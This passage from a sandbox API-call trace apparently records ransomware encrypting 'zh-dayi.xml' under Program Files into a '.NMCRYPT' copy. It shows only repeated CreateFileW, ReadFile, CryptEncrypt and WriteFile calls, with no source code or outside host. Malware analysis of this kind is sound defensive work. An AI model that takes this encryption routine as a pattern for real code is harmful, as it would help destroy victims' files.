shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.194] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=11067) returned 1 [0157.195] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.195] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.197] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.197] GetLastError () returned 0x0 [0157.197] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.198] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.198] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.198] GetLastError () returned 0x0 [0157.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.198] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.198] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.198] GetLastError () returned 0x0 [0157.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.198] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.199] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.199] GetLastError () returned 0x0 [0157.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.199] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.199] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.199] GetLastError () returned 0x0 [0157.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.199] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.199] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.199] GetLastError () returned 0x0 [0157.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.199] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.199] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.199] GetLastError () returned 0x0 [0157.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.199] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.199] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.199] GetLastError () returned 0x0 [0157.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.200] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.200] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.200] GetLastError () returned 0x0 [0157.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.200] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.200] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.200] GetLastError () returned 0x0 [0157.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.200] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.200] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.200] GetLastError () returned 0x0 [0157.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.200] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.200] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.200] GetLastError () returned 0x0 [0157.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.200] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.200] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.200] GetLastError () returned 0x0 [0157.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.201] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.201] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.201] GetLastError () returned 0x0 [0157.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.201] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.201] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.201] GetLastError () returned 0x0 [0157.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.201] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.201] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.201] GetLastError () returned 0x0 [0157.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.201] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.201] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.201] GetLastError () returned 0x0 [0157.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.201] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.202] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.202] GetLastError () returned 0x0 [0157.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.202] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.202] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.202] GetLastError () returned 0x0 [0157.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.202] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.202] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.202] GetLastError () returned 0x0 [0157.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.202] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.202] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.202] GetLastError () returned 0x0 [0157.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.203] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.203] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.203] GetLastError () returned 0x0 [0157.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.203] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.203] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.203] GetLastError () returned 0x0 [0157.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.203] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.203] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.203] GetLastError () returned 0x0 [0157.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.203] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.203] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.203] GetLastError () returned 0x0 [0157.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.203] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.203] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.203] GetLastError () returned 0x0 [0157.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.204] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.204] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.204] GetLastError () returned 0x0 [0157.204] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.204] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.204] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.204] GetLastError () returned 0x0 [0157.204] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.204] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.204] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.204] GetLastError () returned 0x0 [0157.204] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.204] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.204] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.204] GetLastError () returned 0x0 [0157.204] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.204] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.204] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, 